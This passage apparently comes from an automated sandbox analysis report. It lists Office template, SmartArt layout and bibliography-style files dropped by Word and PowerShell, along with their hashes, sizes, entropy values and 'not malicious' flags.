                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19893
                                                                                                                                                        Entropy (8bit):7.592090622603185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                        MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                        SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                        SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                        SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19288
                                                                                                                                                        Entropy (8bit):7.570850633867256
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                        MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                        SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                        SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                        SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22594
                                                                                                                                                        Entropy (8bit):7.674816892242868
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                        MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                        SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                        SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                        SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21111
                                                                                                                                                        Entropy (8bit):7.6297992466897675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                        MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                        SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                        SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                        SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22149
                                                                                                                                                        Entropy (8bit):7.659898883631361
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                        MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                        SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                        SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                        SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20457
                                                                                                                                                        Entropy (8bit):7.612540359660869
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                        MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                        SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                        SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                        SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22008
                                                                                                                                                        Entropy (8bit):7.662386258803613
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                        MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                        SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                        SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                        SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21791
                                                                                                                                                        Entropy (8bit):7.65837691872985
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                        MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                        SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                        SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                        SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):33610
                                                                                                                                                        Entropy (8bit):7.8340762758330476
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                        MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26944
                                                                                                                                                        Entropy (8bit):7.7574645319832225
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                        MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                        SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                        SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                        SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31008
                                                                                                                                                        Entropy (8bit):7.806058951525675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20235
                                                                                                                                                        Entropy (8bit):7.61176626859621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                        MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                        SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                        SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                        SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):32833
                                                                                                                                                        Entropy (8bit):7.825460303519308
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                        MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):28911
                                                                                                                                                        Entropy (8bit):7.7784119983764715
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                        MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31835
                                                                                                                                                        Entropy (8bit):7.81952379746457
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21875
                                                                                                                                                        Entropy (8bit):7.6559132103953305
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                        MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                        SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                        SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                        SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):23597
                                                                                                                                                        Entropy (8bit):7.692965575678876
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                        MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                        SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                        SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                        SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31482
                                                                                                                                                        Entropy (8bit):7.808057272318224
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31605
                                                                                                                                                        Entropy (8bit):7.820497014278096
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34816
                                                                                                                                                        Entropy (8bit):7.840826397575377
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                        MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22340
                                                                                                                                                        Entropy (8bit):7.668619892503165
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                        MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                        SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                        SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                        SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31562
                                                                                                                                                        Entropy (8bit):7.81640835713744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):35519
                                                                                                                                                        Entropy (8bit):7.846686335981972
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                        MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25314
                                                                                                                                                        Entropy (8bit):7.729848360340861
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                        MD5:C47E3430AF813DF8B02E1CB4829DD94B
